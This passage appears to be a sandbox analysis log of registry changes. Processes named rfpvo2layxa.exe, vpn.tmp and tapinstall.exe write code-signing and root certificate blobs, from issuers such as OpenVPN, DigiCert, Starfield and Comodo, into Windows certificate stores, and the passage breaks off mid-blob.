b7e93e4c84f74475c2403fbaf99335beb29aef76c0cbadf9eed476e26ae26aa5e87bb55e851926d2db986d674efd71abe7ecdc4b57c98d65b862725bd09e466949c3cf68cb40631d734ee948e4a7e5c849edf9757530a17e85c91e3dbc61e31a5d30b7250e83316c23728cc3fc0c721f61780a9f8542b575131652426be91885d9756313eff308755b60ccf6ade5f7bd7e32690a51c0b470a3bfe9dbedad74b535349ff469baa3e4d741d7db011501f80afdc4138a345c36e78710681be9d5b2bd45620bfaddf8e4ebd58e0820296f5c40c06fc48db187ff49fcaf489866fdae7c4d7224e3548bac384a5e7b59175c8fd6a667fa6ee3838802ce9be	rfpvo2layxa.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = 030000000100000014000000cbc64d0fc770b1694df723bb18b5679ce09b61ca20000000010000000c06000030820608308204f0a00302010202100ebd24bdfbd4adddd2edd27e8fb1953c300d06092a864886f70d01010b0500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b302906035504031322446967694365727420455620436f6465205369676e696e6720434120285348413229301e170d3136303230393030303030305a170d3139303231333132303030305a3082011d311d301b060355040f0c1450726976617465204f7267616e697a6174696f6e31133011060b2b0601040182373c0201031302555331193017060b2b0601040182373c020102130844656c61776172653110300e06035504051307333736313235363129302706035504091320353938302053746f6e6572696467652044726976652c20537569746520313033310e300c060355041113053934353838310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100dbfa60e717145ef04d047ef2824532ee8a363d6b8fda58b639832f07eccba53b0446715d150e886195607af12d04e77a0f90bca14e70a782603b0ee5b9dca6cf43d5befb9887c54a3a507a82c7dd4a3fec3aed83171ff020b0c1ca50b87751a597b13454a31bd07796eea97ee55631a43d92cbc7275dfc6da478de5f3c8e2c3431db592d2410de2e789465cf73498df4e042aaa085855603e5165b84e25f27c6d29f77a1cc7bf2875da81395715c662b0333b025b37fcac7bd2f3b50a497613d972182c25e796e0dc453264c6e5340bd4962d5d3d37db06dfc03efb0ba8215b9ef2ef52c15d369db3a732259d286a9aa761ccafff0558c8efdab678d785cfe370203010001a38201f1308201ed301f0603551d230418301680148fe87ef06d326a000523c770976a3a90ff6bead4301d0603551d0e041604149bb182bc8ec73483e7d3569d57448488d1803437302e0603551d1104273025a02306082b06010505070803a01730150c1355532d44454c41574152452d33373631323536300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070303307b0603551d1f047430723037a035a0338631687474703a2f2f63726c332e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c3037a035a0338631687474703a2f2f63726c342e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c304b0603551d2004443042303706096086480186fd6c0302302a302806082b06010505070201161c68747470733a2f2f7777772e64696769636572742e636f6d2f4350533007060567810c0103307e06082b0601050507010104723070302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304806082b06010505073002863c687474703a2f2f636163657274732e64696769636572742e636f6d2f44696769436572744556436f64655369676e696e6743412d534841322e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820101006c24a9a7e30a7db2301b344f60cd1b1daf32fce4207ff625bd635f062f8a65301a7d66fade8ba809d0863421631692ef527119eaed4d1f012a98606727c8682aaf1099ca03ab9e996184f4186bce0ca7739c9e6e7144972012ac6eb4ac7db2122b244546f09647fa477a0613401f42e72f4a56fd687d946c4a41e1d1238fe8959e0b6e0cb692e92d96ccc7bde669843c60a374d001608328688790f65ababb20c78c59dad5b32bd79d67c60341c754eae510e08f897e6190c3af2d171261bcea2905545682ace869cd7cc3e66e635dd4f6420dcdc0909b780456523f685aec28b7a5585fae78f36ae3b84d0690f5ee0aa522245546508b2fadb6975f6082d11f	vpn.tmp
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 190000000100000010000000fd960962ac6938e0d4b0769aa1a64e26030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a1d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e76200000001000000200000001465fa205397b876faa6f0a9958e5590e40fcc7faa4fb7c2c8677521fb5fb65809000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030153000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f00720069007400790000000f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6502000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794	rfpvo2layxa.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA	rfpvo2layxa.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	tapinstall.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d4304000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	tapinstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA	vpn.tmp
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\SystemCertificates\CA\Certificates\8D4C4A23BA9EE84EA7348FA98CC6E65FBB69DE7B	rfpvo2layxa.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = 0f00000001000000200000002dc1a6a6cb0cb42f7e0d2c56f38bc7decbccd143405f669070ce130f9249ba48030000000100000014000000cbc64d0fc770b1694df723bb18b5679ce09b61ca20000000010000000c06000030820608308204f0a00302010202100ebd24bdfbd4adddd2edd27e8fb1953c300d06092a864886f70d01010b0500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b302906035504031322446967694365727420455620436f6465205369676e696e6720434120285348413229301e170d3136303230393030303030305a170d3139303231333132303030305a3082011d311d301b060355040f0c1450726976617465204f7267616e697a6174696f6e31133011060b2b0601040182373c0201031302555331193017060b2b0601040182373c020102130844656c61776172653110300e06035504051307333736313235363129302706035504091320353938302053746f6e6572696467652044726976652c20537569746520313033310e300c060355041113053934353838310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100dbfa60e717145ef04d047ef2824532ee8a363d6b8fda58b639832f07eccba53b0446715d150e886195607af12d04e77a0f90bca14e70a782603b0ee5b9dca6cf43d5befb9887c54a3a507a82c7dd4a3fec3aed83171ff020b0c1ca50b87751a597b13454a31bd07796eea97ee55631a43d92cbc7275dfc6da478de5f3c8e2c3431db592d2410de2e789465cf73498df4e042aaa085855603e5165b84e25f27c6d29f77a1cc7bf2875da81395715c662b0333b025b37fcac7bd2f3b50a497613d972182c25e796e0dc453264c6e5340bd4962d5d3d37db06dfc03efb0ba8215b9ef2ef52c15d369db3a732259d286a9aa761ccafff0558c8efdab678d785cfe370203010001a38201f1308201ed301f0603551d230418301680148fe87ef06d326a000523c770976a3a90ff6bead4301d0603551d0e041604149bb182bc8ec73483e7d3569d57448488d1803437302e0603551d1104273025a02306082b06010505070803a01730150c1355532d44454c41574152452d33373631323536300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070303307b0603551d1f047430723037a035a0338631687474703a2f2f63726c332e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c3037a035a0338631687474703a2f2f63726c342e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c304b0603551d2004443042303706096086480186fd6c0302302a302806082b06010505070201161c68747470733a2f2f7777772e64696769636572742e636f6d2f4350533007060567810c0103307e06082b0601050507010104723070302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304806082b06010505073002863c687474703a2f2f636163657274732e64696769636572742e636f6d2f44696769436572744556436f64655369676e696e6743412d534841322e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820101006c24a9a7e30a7db2301b344f60cd1b1daf32fce4207ff625bd635f062f8a65301a7d66fade8ba809d0863421631692ef527119eaed4d1f012a98606727c8682aaf1099ca03ab9e996184f4186bce0ca7739c9e6e7144972012ac6eb4ac7db2122b244546f09647fa477a0613401f42e72f4a56fd687d946c4a41e1d1238fe8959e0b6e0cb692e92d96ccc7bde669843c60a374d001608328688790f65ababb20c78c59dad5b32bd79d67c60341c754eae510e08f897e6190c3af2d171261bcea2905545682ace869cd7cc3e66e635dd4f6420dcdc0909b780456523f685aec28b7a5585fae78f36ae3b84d0690f5ee0aa522245546508b2fadb6975f6082d11f	rfpvo2layxa.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC	rfpvo2layxa.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43	tapinstall.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	tapinstall.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c00000001000000040000000008000004000000010000001000000087ce0b7b2a0e4900e158719b37a893720300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	tapinstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	rfpvo2layxa.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	rfpvo2layxa.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800001900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286040000000100000010000000497904b0eb8719ac47b0bc11519b74d0200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2